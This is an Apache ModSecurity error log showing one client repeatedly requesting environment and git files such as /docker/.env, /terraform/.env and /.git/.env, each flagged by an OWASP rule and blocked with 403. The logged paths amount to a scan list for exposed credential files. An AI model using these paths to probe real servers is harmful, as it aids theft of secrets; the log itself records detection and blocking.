[Mon May 11 16:27:08.630115 2026] [security2:error] [pid 1411099:tid 1411108] [client 18.180.54.2:53886] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/docker/.env"] [unique_id "agHnPA-Qm4vhlWBPlMi6cwAAAAc"]
[Mon May 11 16:27:08.630369 2026] [security2:error] [pid 1411099:tid 1411108] [client 18.180.54.2:53886] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/docker/.env"] [unique_id "agHnPA-Qm4vhlWBPlMi6cwAAAAc"]
[Mon May 11 16:27:08.631031 2026] [core:error] [pid 1411099:tid 1411108] [client 18.180.54.2:53886] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:08.631214 2026] [security2:error] [pid 1411099:tid 1411108] [client 18.180.54.2:53886] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/docker/.env"] [unique_id "agHnPA-Qm4vhlWBPlMi6cwAAAAc"]
[Mon May 11 16:27:08.994130 2026] [security2:error] [pid 1416109:tid 1416136] [client 18.180.54.2:53900] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /infrastructure/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/infrastructure/.env"] [unique_id "agHnPFV4kyjgo4bQBUhU9wAAAMY"]
[Mon May 11 16:27:08.994449 2026] [security2:error] [pid 1416109:tid 1416136] [client 18.180.54.2:53900] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/infrastructure/.env"] [unique_id "agHnPFV4kyjgo4bQBUhU9wAAAMY"]
[Mon May 11 16:27:08.995127 2026] [core:error] [pid 1416109:tid 1416136] [client 18.180.54.2:53900] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:08.995312 2026] [security2:error] [pid 1416109:tid 1416136] [client 18.180.54.2:53900] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/infrastructure/.env"] [unique_id "agHnPFV4kyjgo4bQBUhU9wAAAMY"]
[Mon May 11 16:27:09.373995 2026] [security2:error] [pid 1411055:tid 1411063] [client 18.180.54.2:53904] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /k8s/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/k8s/.env"] [unique_id "agHnPUWKUxpmnkK7zHx8ZwAAAQY"]
[Mon May 11 16:27:09.374257 2026] [security2:error] [pid 1411055:tid 1411063] [client 18.180.54.2:53904] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/k8s/.env"] [unique_id "agHnPUWKUxpmnkK7zHx8ZwAAAQY"]
[Mon May 11 16:27:09.374781 2026] [core:error] [pid 1411055:tid 1411063] [client 18.180.54.2:53904] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:09.374933 2026] [security2:error] [pid 1411055:tid 1411063] [client 18.180.54.2:53904] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/k8s/.env"] [unique_id "agHnPUWKUxpmnkK7zHx8ZwAAAQY"]
[Mon May 11 16:27:09.698984 2026] [security2:error] [pid 1411201:tid 1411249] [client 18.180.54.2:53918] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/docker/.env"] [unique_id "agHnPfy_GXSWIKeli0vysgAAAIM"]
[Mon May 11 16:27:09.699228 2026] [security2:error] [pid 1411201:tid 1411249] [client 18.180.54.2:53918] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/docker/.env"] [unique_id "agHnPfy_GXSWIKeli0vysgAAAIM"]
[Mon May 11 16:27:09.699772 2026] [core:error] [pid 1411201:tid 1411249] [client 18.180.54.2:53918] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:09.699930 2026] [security2:error] [pid 1411201:tid 1411249] [client 18.180.54.2:53918] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/docker/.env"] [unique_id "agHnPfy_GXSWIKeli0vysgAAAIM"]
[Mon May 11 16:27:10.083757 2026] [security2:error] [pid 1411099:tid 1411105] [client 18.180.54.2:53934] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kubernetes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/kubernetes/.env"] [unique_id "agHnPg-Qm4vhlWBPlMi6dgAAAAQ"]
[Mon May 11 16:27:10.084101 2026] [security2:error] [pid 1411099:tid 1411105] [client 18.180.54.2:53934] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/kubernetes/.env"] [unique_id "agHnPg-Qm4vhlWBPlMi6dgAAAAQ"]
[Mon May 11 16:27:10.084648 2026] [core:error] [pid 1411099:tid 1411105] [client 18.180.54.2:53934] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:10.084812 2026] [security2:error] [pid 1411099:tid 1411105] [client 18.180.54.2:53934] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/kubernetes/.env"] [unique_id "agHnPg-Qm4vhlWBPlMi6dgAAAAQ"]
[Mon May 11 16:27:10.423180 2026] [security2:error] [pid 1411201:tid 1411256] [client 18.180.54.2:53940] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /k8s/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/k8s/.env"] [unique_id "agHnPvy_GXSWIKeli0vyswAAAIo"]
[Mon May 11 16:27:10.423449 2026] [security2:error] [pid 1411201:tid 1411256] [client 18.180.54.2:53940] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/k8s/.env"] [unique_id "agHnPvy_GXSWIKeli0vyswAAAIo"]
[Mon May 11 16:27:10.423957 2026] [core:error] [pid 1411201:tid 1411256] [client 18.180.54.2:53940] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:10.424115 2026] [security2:error] [pid 1411201:tid 1411256] [client 18.180.54.2:53940] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/k8s/.env"] [unique_id "agHnPvy_GXSWIKeli0vyswAAAIo"]
[Mon May 11 16:27:10.807890 2026] [security2:error] [pid 1412074:tid 1412099] [client 18.180.54.2:53942] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /terraform/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/terraform/.env"] [unique_id "agHnPjJnyuKVXoStDha1XwAAAFc"]
[Mon May 11 16:27:10.808117 2026] [security2:error] [pid 1412074:tid 1412099] [client 18.180.54.2:53942] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/terraform/.env"] [unique_id "agHnPjJnyuKVXoStDha1XwAAAFc"]
[Mon May 11 16:27:10.808617 2026] [core:error] [pid 1412074:tid 1412099] [client 18.180.54.2:53942] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:10.808799 2026] [security2:error] [pid 1412074:tid 1412099] [client 18.180.54.2:53942] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/terraform/.env"] [unique_id "agHnPjJnyuKVXoStDha1XwAAAFc"]
[Mon May 11 16:27:11.168815 2026] [security2:error] [pid 1411099:tid 1411106] [client 18.180.54.2:53944] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kubernetes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/kubernetes/.env"] [unique_id "agHnPw-Qm4vhlWBPlMi6dwAAAAU"]
[Mon May 11 16:27:11.169055 2026] [security2:error] [pid 1411099:tid 1411106] [client 18.180.54.2:53944] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/kubernetes/.env"] [unique_id "agHnPw-Qm4vhlWBPlMi6dwAAAAU"]
[Mon May 11 16:27:11.169637 2026] [core:error] [pid 1411099:tid 1411106] [client 18.180.54.2:53944] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:11.169803 2026] [security2:error] [pid 1411099:tid 1411106] [client 18.180.54.2:53944] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/kubernetes/.env"] [unique_id "agHnPw-Qm4vhlWBPlMi6dwAAAAU"]
[Mon May 11 16:27:11.547445 2026] [security2:error] [pid 1416109:tid 1416129] [client 18.180.54.2:53960] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /ansible/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/ansible/.env"] [unique_id "agHnP1V4kyjgo4bQBUhU-gAAAMA"]
[Mon May 11 16:27:11.547639 2026] [security2:error] [pid 1416109:tid 1416129] [client 18.180.54.2:53960] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/ansible/.env"] [unique_id "agHnP1V4kyjgo4bQBUhU-gAAAMA"]
[Mon May 11 16:27:11.548123 2026] [core:error] [pid 1416109:tid 1416129] [client 18.180.54.2:53960] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:11.548455 2026] [security2:error] [pid 1416109:tid 1416129] [client 18.180.54.2:53960] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/ansible/.env"] [unique_id "agHnP1V4kyjgo4bQBUhU-gAAAMA"]
[Mon May 11 16:27:11.870505 2026] [security2:error] [pid 1411099:tid 1411111] [client 18.180.54.2:53970] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /terraform/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/terraform/.env"] [unique_id "agHnPw-Qm4vhlWBPlMi6eAAAAAs"]
[Mon May 11 16:27:11.870739 2026] [security2:error] [pid 1411099:tid 1411111] [client 18.180.54.2:53970] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/terraform/.env"] [unique_id "agHnPw-Qm4vhlWBPlMi6eAAAAAs"]
[Mon May 11 16:27:11.871241 2026] [core:error] [pid 1411099:tid 1411111] [client 18.180.54.2:53970] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:11.871403 2026] [security2:error] [pid 1411099:tid 1411111] [client 18.180.54.2:53970] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/terraform/.env"] [unique_id "agHnPw-Qm4vhlWBPlMi6eAAAAAs"]
[Mon May 11 16:27:12.286109 2026] [security2:error] [pid 1416109:tid 1416140] [client 18.180.54.2:53986] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/.git/.env"] [unique_id "agHnQFV4kyjgo4bQBUhU_AAAAMo"]
[Mon May 11 16:27:12.286370 2026] [security2:error] [pid 1416109:tid 1416140] [client 18.180.54.2:53986] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/.git/.env"] [unique_id "agHnQFV4kyjgo4bQBUhU_AAAAMo"]
[Mon May 11 16:27:12.286890 2026] [core:error] [pid 1416109:tid 1416140] [client 18.180.54.2:53986] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:12.287043 2026] [security2:error] [pid 1416109:tid 1416140] [client 18.180.54.2:53986] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/.git/.env"] [unique_id "agHnQFV4kyjgo4bQBUhU_AAAAMo"]
[Mon May 11 16:27:12.587661 2026] [security2:error] [pid 1411099:tid 1411107] [client 18.180.54.2:54000] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /ansible/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/ansible/.env"] [unique_id "agHnQA-Qm4vhlWBPlMi6eQAAAAY"]
[Mon May 11 16:27:12.587890 2026] [security2:error] [pid 1411099:tid 1411107] [client 18.180.54.2:54000] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/ansible/.env"] [unique_id "agHnQA-Qm4vhlWBPlMi6eQAAAAY"]
[Mon May 11 16:27:12.588402 2026] [core:error] [pid 1411099:tid 1411107] [client 18.180.54.2:54000] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
